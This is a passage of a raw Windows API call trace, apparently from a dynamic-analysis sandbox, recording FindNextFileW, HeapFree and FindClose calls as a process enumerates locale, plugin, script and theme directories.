cAlternateFileName="")) returned 1 [0174.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.909] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0174.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.911] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-br", cAlternateFileName="")) returned 1 [0174.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.911] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0174.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.913] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="root", cAlternateFileName="")) returned 1 [0174.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.913] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0174.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.915] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0174.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.139] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl-si", cAlternateFileName="")) returned 1 [0175.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.139] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0175.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.140] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv-se", cAlternateFileName="")) returned 1 [0175.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.140] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0175.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.140] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x4c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0175.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.140] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0175.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.140] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0175.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.140] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0175.141] FindClose (in: hFindFile=0x7276c8 | out: hFindFile=0x7276c8) returned 1 [0175.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.141] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nls", cAlternateFileName="")) returned 0 [0175.141] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0175.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0175.142] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dev", cAlternateFileName="")) returned 0 [0175.142] FindClose (in: hFindFile=0x727588 | out: hFindFile=0x727588) returned 1 [0175.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.143] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="libs", cAlternateFileName="")) returned 1 [0175.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.145] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0.2.2", cAlternateFileName="020A5B~1.2")) returned 0 [0175.145] FindClose (in: hFindFile=0x727a48 | out: hFindFile=0x727a48) returned 1 [0175.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0175.145] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="require", cAlternateFileName="")) returned 1 [0175.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.146] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.1.15", cAlternateFileName="211994~1.15")) returned 0 [0175.146] FindClose (in: hFindFile=0x727b88 | out: hFindFile=0x727b88) returned 1 [0175.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0175.146] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="require", cAlternateFileName="")) returned 0 [0175.146] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0175.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.146] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="misc", cAlternateFileName="")) returned 1 [0175.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.146] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0x24df500, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24df500, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plugins", cAlternateFileName="")) returned 1 [0175.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.151] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee9dc909, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee9dc909, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee9dc909, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0175.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.160] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee9dc909, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee9dc909, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee9dc909, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0175.160] FindClose (in: hFindFile=0x727a48 | out: hFindFile=0x727a48) returned 1 [0175.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.160] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee9dc909, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee9dc909, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee9dc909, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0175.160] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0175.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.160] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0175.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-es", cAlternateFileName="")) returned 1 [0175.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0175.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.206] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-dk", cAlternateFileName="")) returned 1 [0175.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.206] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0175.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.207] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ae", cAlternateFileName="")) returned 1 [0175.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.208] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0175.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.208] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-il", cAlternateFileName="")) returned 1 [0175.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.209] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0175.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.210] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu-es", cAlternateFileName="")) returned 1 [0175.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.210] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0175.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.211] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea4f00c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea4f00c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea4f00c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 